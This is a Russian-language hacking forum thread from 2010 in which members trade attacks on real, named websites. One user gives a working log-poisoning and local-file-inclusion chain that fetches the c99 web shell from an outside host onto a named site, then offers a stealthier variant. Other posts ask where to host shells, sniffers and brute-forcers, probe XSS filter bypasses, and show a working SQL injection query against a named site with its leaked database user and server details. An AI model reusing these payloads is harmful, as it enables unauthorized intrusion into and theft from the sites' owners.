Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.05.2010, 20:01
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от 547
в ответ в логах вижу это:
http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)
я такое там нашел:
PHP Warning: include(): URL file-access is disabled in the server configuration
allow_url_fopen On On
allow_url_include Off Off
залил шел так:
1.
http://www.aiesec-berlin.de/KDK/index.php?load=StSigX15981<?php copy($_GET[aa],$_GET[bb]);include($_GET[bb]); ?>EndSigX15981
2.
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00&aa=http://madnet.name/files/download/9_c99madshell.php&bb=/tmp/qwe.php
кривовато правда получилось (к шелу еще вся эта хрень грузится), но работает 
думаю с этим можно дальше уже справиться
Последний раз редактировалось DrakonHaSh; 20.05.2010 в 20:17..
|
|
|
20.05.2010, 20:39
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
чето уже негрузится
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?
и что это ты понаписал StSigX15981???????
и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал
ты присвоил глобальной переменной aa сайт маднета
и проинклудил его... прикольно, но очень паливно
Последний раз редактировалось 547; 20.05.2010 в 20:47..
|
|
|
|
20.05.2010, 20:55
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от 547
чето уже негрузится
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?
и что это ты понаписал StSigX15981???????
и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал
ты присвоил глобальной переменной aa сайт маднета
и проинклудил его... прикольно, но очень паливно StSigX15981 - это для визуализации в логах того, что запрос нормально записался
да, шел грузился вместе с логами
паливно да, но это я на скорую руку сделал, по умному надо было бы так:
http://www.aiesec-berlin.de/KDK/index.php?load=<?php if ($_GET[cxc]=1){ob_clean();copy($_GET[axa],$_GET[bxb]);include($_GET[bxb]);}; ?>
ob_clean() или ob_end_clean() - попытка очистить все, что было выведено до начала шела - т.е. чтоб грузился только шел, без этих мегабайтов лога. проверить не успел
|
|
|
|
20.05.2010, 23:50
|
|
Познающий
Регистрация: 31.05.2007
Сообщений: 39
Провел на форуме:
164949
Репутация:
0
|
|
1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh
2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.
|
|
|
|
21.05.2010, 00:23
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от Konqi
ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();
интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)
подскажите с чем это может быть связано,что profile.php не работает..
Если не ошибаюсь то код с которым ты восстановил БД через какое то время удаляется!!!
Лично у меня такое было пару раз!!
|
|
|
|
21.05.2010, 00:25
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от Demon1X
1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh
2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.
1. Никак. хоть какие права там будут!
2. Шел без разницы каким макаром заливать!!
Лучше всего когда юзер и группа ROOT, тогда можешь все файлв изменять. Хотя и тут куча разных факторов!
Последний раз редактировалось GOGA075; 21.05.2010 в 00:30..
|
|
|
|
21.05.2010, 01:04
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
DrakonSerg Пробуй
www.........com/admin
www.........com/admin.php
www.........com/admininstrator
и так далее. все писать не буду!
А папка читается видно из-за неграмотности или пофигизма администрации сайта!
|
|
|
|
21.05.2010, 11:34
|
|
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992
Репутация:
-1
|
|
Привет всем, давненько у Вас не появлялся, вот вновь пришел!
Ребята есть вопрос, сегодня на одном из сайтов искал XSS при вводе <script>alert()</script> фильтр полностью обрезает что находится внутри <script></script>
Пробовал по другому <script 1></script 1> толку ноль!
BB кодами тож пробовал, разрешен код [IM*G][/IM*G] - (* нарочно поставил, что бы форум не реагировал!) если ставишь картинку то показывает ее нормально, если после картинки пробел то показывает только ссылку и тишина.
Подскажите что сделать можно!
|
|
|
|
21.05.2010, 13:04
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
WebeX
http://ha.ckers.org/xss.html
|
|
|
|
21.05.2010, 18:06
|
|
Новичок
Регистрация: 14.05.2010
Сообщений: 2
Провел на форуме:
13050
Репутация:
6
|
|
я в slq новичек так что не пинайте сильно
Сообщение от xxx
http://youthscienceforum.ca/view.php?id=17+and+1=2+union+select+1,2,3,aes_decr ypt(aes_encrypt(concat_ws(0x3a,version(),d atabase(),user()),0x71),0x71),5,6--
Version : 5.0.19-standard
Database : youthscienceforum
User : youthscience@205.207.185.71
OS : apple-darwin8.2.1
для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).
Последний раз редактировалось nedon; 21.05.2010 в 18:09..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
